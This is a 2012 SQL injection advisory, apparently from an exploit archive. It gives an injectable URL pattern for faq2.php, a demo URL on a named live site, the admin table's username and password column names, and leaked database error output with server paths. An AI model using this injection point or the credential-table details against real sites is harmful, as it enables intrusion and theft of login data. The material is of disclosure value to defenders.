DGC SQL Injection

2012.01.31
Credit: skote_vahshat
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _\/\ _`\ /\ \/\ \ | |* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } | |* \ \ \ \ \ _ <'\ \ _ \ | |* \ \ \ \ \ \L\ \\ \ \ \ \ | |* \ \_\ \ \____/ \ \_\ \_\ | |* \/_/ \/___/ \/_/\/_/ | |* | |* I'm Wolf Long live wolf | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ======================================================================= \* [Title] :[dgc sql injection vulnerability] /* \* [Author] :[skote_vahshat] /* \* [Home] :[Http://turk-bh.ir] /* \* [Email] :[skote.vahshat@Gmail.Com] /* ======================================================================= /* Web Server ==>> [ Apache/2.0.55 (Ubuntu) PHP/4.4.2-1build1 ] /* Powered-by ==>> [ PHP/4.4.2-1build1 ] /* DB Server ==>> [ MySQL ] /* /* [+]Exploit : /* http://www.target.com/faq2.php?id=[SQLi] /* [+]Demo: /* http://www.dgc.ca/faq2.php?language=0&id=173&faqid=573 /* [+] Tble admin: /* bs_availability_user /* /* [+]column name: /* username pass /* /* [+]ErroR injection: /* /* /*/----------------------- /* /* SELECT * FROM faq WHERE id = 573 <?php = array ( 0 => array ( 'file' => '/mnt/alpha/dgc.ca/include/faq.php', 'line' => 26, 'function' => 'querydb', 'class' => 'faq', 'type' => '->', 'args' => array ( 0 => 'SELECT * FROM faq WHERE id = 573\\\'', ), ), 1 => array ( 'file' => '/mnt/alpha/dgc.ca/include/faq.php', 'line' => 20, 'function' => 'load', 'class' => 'faq', 'type' => '->', 'args' => array ( ), ), 2 => array ( 'file' => '/mnt/alpha/dgc.ca/faq2.php', 'line' => 150, 'function' => 'faq', 'class' => 'faq', 'type' => '->', 'args' => array ( 0 => '573\\\'', ), ), ); ?> /* // QUERY: SELECT id FROM faq WHERE parent_id = 573\' ORDER BY display_order <?php = array ( 0 => array ( 'file' => '/mnt/alpha/dgc.ca/include/faq.php', 'line' => 201, 'function' => 'querydb', 'class' => 'faq', 'type' => '->', 'args' => array ( 0 => 'SELECT id FROM faq WHERE parent_id = 573\\\' ORDER BY display_order', ), ), 1 => array ( 'file' => '/mnt/alpha/dgc.ca/faq2.php', 'line' => 151, 'function' => 'get_children_ids', 'class' => 'faq', 'type' => '->', 'args' => array ( ), ), ); ?> ======================================================================= |_***_| spical thanks : bl4ck.viper ,dr.tofan , nafsh, netqurd | |_***_| tbh team , cyberwh team , all turkiS hackers| =======================================================================

References:

http://packetstormsecurity.org/files/109215/dgc-sql.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top